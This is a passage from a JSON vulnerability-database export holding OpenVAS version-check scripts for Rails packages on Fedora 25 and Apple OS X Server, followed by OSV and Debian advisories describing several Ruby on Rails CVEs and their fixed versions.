script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionpack FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionpack'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionpack on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7SB36DN7LSLP2GHE4LNAQGWXRMHZEU5F\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionpack\", rpm:\"rubygem-actionpack~5.0.0.1~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:27", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-railties FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871937", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871937", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-railties FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871937\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:20:47 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-railties FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-railties'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-railties on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWPXPNMF2BDDQ7AGYMPNOYVDE3BN3RFG\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-railties\", rpm:\"rubygem-railties~5.0.0.1~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionview FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871981", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871981", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionview FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871981\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:22:25 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionview FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionview on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/INSRTFAYYUM2XLIWRMW2ZQBU6VNPXG6B\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionview\", rpm:\"rubygem-actionview~5.0.0.1~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:13", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionmailer FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872056", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872056", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionmailer FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872056\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:25:50 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionmailer FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionmailer'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionmailer on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SVDJLLIW67K6FGDQKQEY6EGTKQ7KXRQU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionmailer\", rpm:\"rubygem-actionmailer~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:36", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-rails FEDORA-2016-5760339e76", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6317", "CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871890", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-rails FEDORA-2016-5760339e76\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871890\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:19:40 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-rails FEDORA-2016-5760339e76\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-rails'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-rails on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WAMEZEEF5UHZPV5IDQY4ZP5VLSRSFHY5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-rails\", rpm:\"rubygem-rails~5.0.0.1~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-07-17T14:21:16", "description": "This host is installed with Apple OS X Server\n and is prone to denial of service and user enumeration vulnerabilities.", "cvss3": {}, "published": "2017-04-03T00:00:00", "type": "openvas", "title": "Apple OS X Server Denial of Service And User Enumeration Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-2382", "CVE-2016-0751", "CVE-2007-6750"], "modified": "2019-07-05T00:00:00", "id": "OPENVAS:1361412562310810599", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810599", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple OS X Server Denial of Service And User Enumeration Vulnerabilities\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:apple:os_x_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810599\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2016-0751\", \"CVE-2007-6750\", \"CVE-2017-2382\");\n script_bugtraq_id(90690, 90689);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-04-03 10:32:56 +0530 (Mon, 03 Apr 2017)\");\n script_name(\"Apple OS X Server Denial of Service And User Enumeration Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple OS X Server\n and is prone to denial of service and user enumeration vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An insufficient permission check for access in Wiki server.\n\n - The partial HTTP requests in Web Server.\n\n - The caching for unknown MIME types, which can cause a global cache to grow\n indefinitely.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to enumerate users and cause a denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Apple OS X Server before 5.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple OS X Server 5.3 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207604\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_macosx_server_detect.nasl\");\n script_mandatory_keys(\"Apple/OSX/Server/Version\", \"ssh/login/osx_version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || version_is_less(version:osVer, test_version:\"10.12.4\")){\n exit(0);\n}\n\nif(!serVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:serVer, test_version:\"5.3\"))\n{\n report = report_fixed_ver(installed_version:serVer, fixed_version:\"5.3\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "osv": [{"lastseen": "2022-08-10T07:11:05", "description": "\nTwo vulnerabilities have been discovered in Rails, a web application\nframework written in Ruby. Both vulnerabilities affect Action Pack, which\nhandles the web requests for Rails.\n\n\n* [CVE-2016-2097](https://security-tracker.debian.org/tracker/CVE-2016-2097)\nCrafted requests to Action View, one of the components of Action Pack,\n might result in rendering files from arbitrary locations, including\n files beyond the application's view directory. This vulnerability is\n the result of an incomplete fix of \n [CVE-2016-0752](https://security-tracker.debian.org/tracker/CVE-2016-0752).\n This bug was found by Jyoti Singh and Tobias Kraze from Makandra.\n* [CVE-2016-2098](https://security-tracker.debian.org/tracker/CVE-2016-2098)\nIf a web applications does not properly sanitize user inputs, an\n attacker might control the arguments of the render method in a\n controller or a view, resulting in the possibility of executing\n arbitrary ruby code.\n This bug was found by Tobias Kraze from Makandra and joernchen of\n Phenoelit.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u2.\n\n\nFor the testing distribution (stretch), these problems have been fixed\nin version 2:4.2.5.2-1.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.2-1.\n\n\nWe recommend that you upgrade your rails packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-03-09T00:00:00", "type": "osv", "title": "rails - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098", "CVE-2016-0752", "CVE-2016-2097"], "modified": "2022-08-10T07:10:58", "id": "OSV:DSA-3509-1", "href": "https://osv.dev/vulnerability/DSA-3509-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T05:37:03", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-24T18:33:35", "type": "osv", "title": "actionview Path Traversal vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2023-03-28T05:37:01", "id": "OSV:GHSA-VX9J-46RH-FQR8", "href": "https://osv.dev/vulnerability/GHSA-vx9j-46rh-fqr8", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-21T08:26:15", "description": "\nMultiple security issues have been discovered in the Ruby on Rails web\napplication development framework, which may result in denial of service,\ncross-site scripting, information disclosure or bypass of input\nvalidation.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 2:4.1.8-1+deb8u1.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.1-1.\n\n\nWe recommend that you upgrade your rails packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-01-31T00:00:00", "type": "osv", "title": "rails - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7577", "CVE-2015-3227", "CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-0753", "CVE-2015-3226", "CVE-2016-0752"], "modified": "2022-07-21T05:48:56", "id": "OSV:DSA-3464-1", "href": "https://osv.dev/vulnerability/DSA-3464-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-21T08:25:32", "description": "\nAndrew Carpenter of Critical Juncture discovered a cross-site scripting\nvulnerability affecting Action View in rails, a web application\nframework written in Ruby. Text declared as HTML safe will not have\nquotes escaped when used as attribute values in tag helpers.\n\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:4.1.8-1+deb8u4.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:4.2.7.1-1.\n\n\nWe recommend that you upgrade your rails packages.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-25T00:00:00", "type": "osv", "title": "rails - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2022-07-21T05:49:10", "id": "OSV:DSA-3651-1", "href": "https://osv.dev/vulnerability/DSA-3651-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-28T05:37:35", "description": "Cross-site scripting (XSS) vulnerability in Action View in Ruby on Rails 3.x before 3.2.22.3, 4.x before 4.2.7.1, and 5.x before 5.0.0.1 might allow remote attackers to inject arbitrary web script or HTML via text declared as \"HTML safe\" and used as attribute values in tag handlers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-10-24T18:33:35", "type": "osv", "title": "actionview Cross-site Scripting vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2023-03-28T05:37:30", "id": "OSV:GHSA-PC3M-V286-2JWJ", "href": "https://osv.dev/vulnerability/GHSA-pc3m-v286-2jwj", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-28T05:38:58", "description": "The http_basic_authenticate_with method in actionpack/lib/action_controller/metal/http_authentication.rb in the Basic Authentication implementation in Action Controller in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not use a constant-time algorithm for verifying credentials, which makes it easier for remote attackers to bypass authentication by measuring timing differences.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", 